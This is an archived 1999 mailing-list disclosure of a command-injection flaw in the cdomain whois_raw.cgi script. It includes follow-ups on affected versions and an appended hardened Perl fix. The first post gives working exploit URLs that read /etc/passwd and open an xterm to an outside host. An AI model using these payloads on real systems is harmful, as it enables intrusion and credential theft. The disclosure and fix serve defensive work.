`Date: Tue, 1 Jun 1999 00:34:51 +0200
From: Salvatore Sanfilippo -antirez- <[email protected]>
To: [email protected]
Subject: whois_raw.cgi problem
Hi,
sorry if this has already been known.
There is a problem in whois_raw.cgi, called from
whois.cgi. whois_raw.cgi is part of cdomain v1.0.
I don't know if new versions are vulnerable.
#!/usr/bin/perl
#
# whois_raw.cgi Written by J. Allen Hatch ([email protected])
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
# http://www.your-site.com/~zone/whois.html
...
require ("/usr/lib/perl5/cgi-lib.pl");
...
$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
@result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
@result="Dettagli non disponibili per il dominio richiesto.";
} else {
@result=`$whois_cmd $fqdn`;
}
...
The exploit is a banal and well-known problem:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
bye,
antirez
--
Salvatore Sanfilippo antirez | [email protected] | [email protected]
try hping: http://www.kyuzz.org/antirez [email protected]
'se la barca non ce l'hai dove uzba te ne vai?
se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)
---------------------------------------------------------------------------------
Date: Wed, 2 Jun 1999 00:16:42 +0200
From: Peter van Dijk <[email protected]>
To: [email protected]
Subject: Re: whois_raw.cgi problem
On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> Hi,
>
> sorry if this has already been known.
>
> There is a problem in whois_raw.cgi, called from
> whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> I don't know if new versions are vulnerable.
Version 2.0 is just as vulnerable.
The commercial version (the one that runs on NT too :) is _not_ vulnerable
since it does its own socket thing instead of starting 'whois'.
I've known of this bug in cdomain for about 6 months but never got around
to writing up an advisory...
Greetz, Peter
--
| 'He broke my heart, | Peter van Dijk |
I broke his neck' | [email protected] |
nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |
---------------------------------------------------------------------------------
Date: Wed, 2 Jun 1999 01:06:22 +0200
From: Peter van Dijk <[email protected]>
To: [email protected]
Subject: Re: whois_raw.cgi problem
On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote:
> On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> > Hi,
> >
> > sorry if this has already been known.
> >
> > There is a problem in whois_raw.cgi, called from
> > whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> > I don't know if new versions are vulnerable.
>
> Version 2.0 is just as vulnerable.
>
> The commercial version (the one that runs on NT too :) is _not_ vulnerable
> since it does its own socket thing instead of starting 'whois'.
>
> I've known of this bug in cdomain for about 6 months but never got around
> to writing up an advisory...
To elaborate on this a bit further: cdomain-free 2.4 and lower are
_vulnerable_. cdomain-free 2.5 and all commercial cdomain versions I've
seen are _not_ vulnerable, because they connect to the whois servers
themselves.
cdomain-free is available for download at www.cdomain.com.
Greetz, Peter
--
| 'He broke my heart, | Peter van Dijk |
I broke his neck' | [email protected] |
nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |
`
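The backtick call in the quoted script hands `$fqdn` to a shell, which is why a newline in the parameter starts a second command. The following is an added example, not code from the posts or from cdomain, showing one way to harden that call: strict validation of the name plus a list-form pipe open that never invokes a shell. `valid_fqdn` and `run_whois` are hypothetical names, and `/bin/echo` stands in for the whois client so the demo runs offline.

```perl
#!/usr/bin/perl
# Added example (not cdomain code): hardened replacement for the
# `$whois_cmd $fqdn` backtick call shown in the advisory.
use strict;
use warnings;

# Accept only a plain hostname: letter/digit/hyphen labels joined by dots.
# \A and \z anchor the entire string; unlike ^ and $, they do not let a
# trailing or embedded newline (the %0A in the advisory's URLs) through.
# A leading '-' is also rejected, so the value cannot be read as an option.
sub valid_fqdn {
    my ($name) = @_;
    return 0 unless defined $name && length($name) <= 253;
    return ($name =~ /\A(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}\z/) ? 1 : 0;
}

# List-form pipe open execs the program directly with $fqdn as a single
# argument; /bin/sh never parses it, so metacharacters have no meaning.
sub run_whois {
    my ($cmd, $fqdn) = @_;
    return ("Invalid domain name.\n") unless valid_fqdn($fqdn);
    open(my $fh, '-|', $cmd, $fqdn) or return ("Lookup failed.\n");
    my @result = <$fh>;
    close $fh;
    return @result;
}

# Constructed inputs. The second is the decoded fqdn value from the
# advisory's first URL. In the CGI, the first argument would be the
# configured path of the whois client instead of /bin/echo.
for my $in ("example.com", "\ncat /etc/passwd", "example.com\n", "-h", "a..b") {
    (my $shown = $in) =~ s/\n/\\n/g;
    printf "%-22s => %s", "'$shown'", join('', run_whois('/bin/echo', $in));
}
```

Only the first input reaches the stand-in command; the other four are rejected before any process is started.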